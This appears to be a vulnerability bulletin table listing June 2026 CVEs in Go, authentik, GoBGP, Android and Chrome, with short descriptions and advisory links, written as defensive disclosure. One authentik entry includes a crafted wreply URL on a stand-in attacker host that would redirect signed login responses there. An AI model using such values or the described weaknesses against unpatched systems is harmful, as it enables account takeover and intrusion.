| Go standard library--net/textproto | When returning errors, functions in the net/textproto package would include its input as part of the error. This might allow an attacker to inject misleading content to errors that are printed or logged. | 2026-06-02 | not yet calculated | CVE-2026-42507 | https://go.dev/issue/79346 https://go.dev/cl/777060 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5039 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to version 2026.2.3, the WS-Federation provider validates the user-supplied wreply parameter using a raw string prefix check rather than proper URL parsing. An attacker who can craft a login link can supply a wreply value on a different origin that passes the check (e.g. https://portal.example.com.evil.tld/), causing the victim's browser to POST the signed WS-Federation login response to attacker-controlled infrastructure. This issue has been patched in version 2026.2.3. | 2026-06-02 | not yet calculated | CVE-2026-41569 | https://github.com/goauthentik/authentik/security/advisories/GHSA-995q-72cw-cfw3 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5 and 2026.2.3, the SAML source response processor (ResponseProcessor.parse()) does not validate the Conditions element on assertions. NotBefore, NotOnOrAfter, and AudienceRestriction are all ignored. This allows replay of expired assertions and acceptance of assertions intended for other service providers. This issue has been patched in versions 2025.12.5 and 2026.2.3. | 2026-06-02 | not yet calculated | CVE-2026-41577 | https://github.com/goauthentik/authentik/security/advisories/GHSA-4v4x-x5pr-8gp2 |
| Gobgp--Gogbp | An integer underflow in the BGPUpdate.DecodeFromBytes function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-06-03 | not yet calculated | CVE-2026-37462 | https://github.com/osrg/gobgp/blob/v4.3.0/pkg/packet/bgp/bgp.go https://github.com/osrg/gobgp/commit/9ce8936672ebc07df524da77fa4c6ae26d92be6d |
| Google--Android | In multiple locations, there is a possible way to reveal images across users due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-22424 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In many functions of ComputerEngine.java, there is a possible way to access URIs across users due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-22426 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setUserDisclaimerAcknowledged of CarDevicePolicyService.java, there is a possible way to bypass the user dialog when adding an account to a managed device due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-26418 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible background activity launch due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-32348 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of PipTaskOrganizer.java, there is a possible way to launch an activity from the background due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48570 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to achieve code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48595 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of KeyguardViewMediator.java , there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48616 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In isSameApp of NotificationManagerService.java, there is a possible persistent dos due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48648 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to reset user-selected permissions selections due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48649 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In performPreInstallChecks of InstallRepository.kt, there is a possible way to bypass MDM policy due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2025-48652 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible tapjacking due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0009 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In updateProvidersWhenServiceRemoved of CredentialManagerService.java, there is a possible way to override settings across users due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0016 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of AccessibilityManagerService.java, there is a possible persistent denial of service due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0018 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In startAnimation of StageCoordinator.java, there is a possible tapjacking issue due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0036 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0039 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0040 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible UBSan failure due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0041 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0042 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0043 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause the system to crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0044 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In bta_jv_rfcomm_connect of bta_jv_act.cc, there is a possible bypass of bonding for a secure connection due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0045 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In InputInterceptor of Letterbox.java, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0046 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In hide of WindowState.java, there is a possible way to trick the user into approving permissions due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0048 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In handleBondStateChanged of AdapterService.java, there is a possible sensitive information disclosure due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0050 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0051 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0052 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In createSessionInternal of PackageInstallerService.java, there is a possible to update a Device Policy Controller (DPC) into an invalid directory due to a path traversal error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0055 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setTo of ResourceTypes.cpp, there is a possible read out of bounds due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0056 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of sdp_discovery.cc, there is a possible way to achieve code execution due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0059 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In updateState of GraphicsDriverEnableAngleAsSystemDriverController.java, there is a possible persistent dos issue due to an unusual root cause. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0060 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of WindowState.java, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0061 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a permanent denial of service due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0067 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In verifySignature of ApkChecksums.java, there is a possible way to cause a crash due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0069 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of DevicePolicyManagerService.java, there is a possible way to hide a system critical package due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0070 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getPreferredSize of LauncherProcessImageListener.kt, there is a possible denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0074 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions, there is a possible way to access the contacts database due to a SQL injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0075 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In validateNode of ResourceTypes.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0076 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In resumeConfigurationDispatch of ActivityRecord.java, there is a possible background application launch (bal) due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0077 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In setGlobalProxy of DevicePolicyManagerService.java, there is a possible desync in persistence due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0078 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible persistent denial of service due to an integer overflow. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0079 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of ubsan_throwing_runtime.cpp, there is a possible way to cause a crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0080 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In applySimpleFieldMaxSize of DataRowHandler.java, there is a possible way to insert a large contact name due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0085 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In onCreate of DisableSupervisionActivity.kt, there is a possible way to delete supervision data due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0086 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In approvalLevelForDomainInternal of DomainVerificationService.java, there is a possible way to hijack an arbitrary app link due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0087 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getCallingAppLabel of CertInstaller.java, there is a possible way to hide a sensitive security dialogue due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0088 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of PackageInstallerService.java, there is a possible way to install unverified apps due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0089 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to execute code in the launcher process due to an over-privileged shell user. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0091 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible misleading UI due to obfuscation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0093 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getApplicationLabel of KeyChainActivity.java, there is a possible way to trick the user into approving access to certificates due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0094 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In l2c_fcr_clone_buf of l2c_fcr.cc, there is a possible way to trigger controlled heap corruption within the privileged Bluetooth process due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0095 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getAppLabel of ForgetDeviceDialogFragment.java, there is a possible trick the user into forgetting a device due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0096 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple locations, there is a possible way to bypass user interaction when pairing an LE device due to a logic error. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0097 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In getCallingPackageName of Shared.java, there is a possible way to bypass activity start restrictions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0098 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In onNullBinding of HostEmulationManager.java, there is a possible way to launch an activity from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0099 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In Load of LoadedArsc.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0100 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In addWindow of WindowManagerService.java, there is a possible tapjacking issue due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28577 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of DevicePolicyManagerService.java, there is a possible desync from persistence due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28578 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions, there is a possible desync in persistence due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28580 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In fixInitiatingUserIfNecessary of CallIntentProcessor.java, there is a possible way to make an emergency call due to a logic error in the code. This could lead to local with null execution privileges needed. User interaction is null for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28581 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android | In multiple functions of AppOpsService.java, there is a possible missing permission check due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-28586 | https://source.android.com/docs/security/bulletin/2026/2026-06-01 |
| Google--Android XR | In addInputMethodListener of com.android.server.inputmethod.InputMethodManagerService, there is a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-06-01 | not yet calculated | CVE-2026-0072 | https://source.android.com/docs/security/bulletin/xr/2026/2026-06-01 |
| Google--Chrome | Out of bounds read and write in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10881 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498904293 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10882 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503420443 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10883 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503768143 |
| Google--Chrome | Use after free in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10884 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503617302 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10885 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504072665 |
| Google--Chrome | Use after free in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10886 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505096898 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10887 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505204771 |
| Google--Chrome | Use after free in Cast Streaming in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10888 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505815080 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10889 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513003797 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10890 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513136593 |
| Google--Chrome | Use after free in GFX in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10891 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513160681 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10892 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513165325 |
| Google--Chrome | Use after free in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10893 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513231432 |
| Google--Chrome | Use after free in Printing in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10894 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513445101 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10895 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513454018 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10896 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513514692 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10897 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513543143 |
| Google--Chrome | Stack buffer overflow in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10898 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513946753 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10899 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516653777 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10900 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516878683 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10901 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516957738 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-04 | not yet calculated | CVE-2026-10902 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/517046249 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10903 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503422316 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10904 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506855825 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10905 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487357841 |
| Google--Chrome | Use after free in WebAuthentication in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10906 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503420438 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10907 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489071023 |
| Google--Chrome | Use after free in FullScreen in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10908 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505045913 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10909 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508092644 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10910 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508811477 |
